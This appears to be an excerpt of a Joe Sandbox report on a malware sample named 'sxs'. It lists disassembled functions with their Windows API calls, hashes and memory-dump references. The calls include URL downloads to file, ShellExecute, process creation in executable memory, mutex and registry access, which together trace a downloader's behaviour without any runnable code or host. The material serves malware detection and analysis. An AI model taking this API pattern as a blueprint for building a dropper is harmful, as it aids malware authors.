                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
                                                                            Function 00402AFA Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction ID: c6e1b1fb9c3516b3f16996619766862c98deb96cc2c348e4269c8597c4437c2e
                                                                            • Opcode Fuzzy Hash: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction Fuzzy Hash: 1EF03071604118BFD704DEAADE89E6BB7ECDF54350B104477F508EB281E6B4ED009674
                                                                            Function 00402820 Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040283F
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402848
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction ID: 4855b5fc16def7a8e97b1a7a6336b917eadaa4f84f3b808a2882fe3178674162
                                                                            • Opcode Fuzzy Hash: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction Fuzzy Hash: 20E092766141206BDB50EE764A84B6323CCAF48390B00C17BBA08EB285E274D8014775
                                                                            Function 00402FAC Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction ID: 4a6b08c2b722228e21e0a8b4d92f73f88c53a7eb371671c656a79b332b0462ea
                                                                            • Opcode Fuzzy Hash: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction Fuzzy Hash: 79D05B201041016FE72067358A2A73D7595E744784FE44477F449F96E1E5FDCC85911D
                                                                            Function 004012D0 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            Function 0053168F Relevance: 1.7, APIs: 1, Instructions: 168processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 005311B6: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00531822
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCreateProcessVirtual
                                                                            • String ID:
                                                                            • API String ID: 3731624130-0
                                                                            • Opcode ID: bf63ac8923344cf0f07f494334df50f3db5578ecde303786fb80a434433568e3
                                                                            • Instruction ID: f35bf163610438ad47d3d825aae3b342a66b7216eb0a28839ef9269c94bb1ec5
                                                                            • Opcode Fuzzy Hash: bf63ac8923344cf0f07f494334df50f3db5578ecde303786fb80a434433568e3
                                                                            • Instruction Fuzzy Hash: EF411C72904A19AEDB259AB4DC8EFEF7FACFF44350F14046AF100E7181EE709944CA68
                                                                            Function 00439D46 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction ID: 59c6dd2a180df94c7d145a0c1afdd1ca961f3c5420aeb78bf2f24ad8b18ccf6d
                                                                            • Opcode Fuzzy Hash: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction Fuzzy Hash: 08516E72A042068FC724CF18C881A5BB3E5BF88710F19892EEC59DB355DB75ED06CB95
                                                                            Function 00438524 Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction ID: 4fc79d3f2b5b8faf063af9b8bc26cff02520aca8bab65447a439d837e7e270b0
                                                                            • Opcode Fuzzy Hash: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction Fuzzy Hash: 2821C272904354EFEB224B14DC407BBF7A0EF88314F34686EF48A57281DA785D85CA54
                                                                            Function 005313C4 Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,00000000,00000000,00000000,?,00531497,00000000,00000000,00000000,?,00000000,00000000), ref: 005313EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4b9ecea32db01424dc185457aeca794cda4a3d93e46afead20aaf72f8814e263
                                                                            • Instruction ID: 2d1c0f53b8a4c757ac03afde7fdb5f3811b67f33a561e85e7a19b27d327bb1d3
                                                                            • Opcode Fuzzy Hash: 4b9ecea32db01424dc185457aeca794cda4a3d93e46afead20aaf72f8814e263
                                                                            • Instruction Fuzzy Hash: D41182B2A00605AFDF10CF39D880A657BA8FF14764F258529ED19CB351E731EC55CBA4
                                                                            Function 004042AA Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
                                                                            Function 004042AC Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
                                                                            Function 00408494 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                              • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                              • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                              • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                              • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1369373786-0
                                                                            • Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
                                                                            • Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
                                                                            Function 00404BFC Relevance: 1.5, APIs: 1, Instructions: 12registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
                                                                            • Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
                                                                            Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                              • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedExecuteInternetShellState
                                                                            • String ID:
                                                                            • API String ID: 3822808191-0
                                                                            • Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
                                                                            • Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
                                                                            Function 004013AC Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction ID: b23f443f85bfc2a6968270b1b6cd2558eb490b707325928d34c95879452a6769
                                                                            • Opcode Fuzzy Hash: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction Fuzzy Hash: 2C11AC72A047019FC320CF29CD80A2BB7E1EBC4360F15C63EE588A73B5E634AC40C689
                                                                            Function 004014F8 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            Function 00439CC7 Relevance: 1.3, APIs: 1, Instructions: 45memoryCOMMON
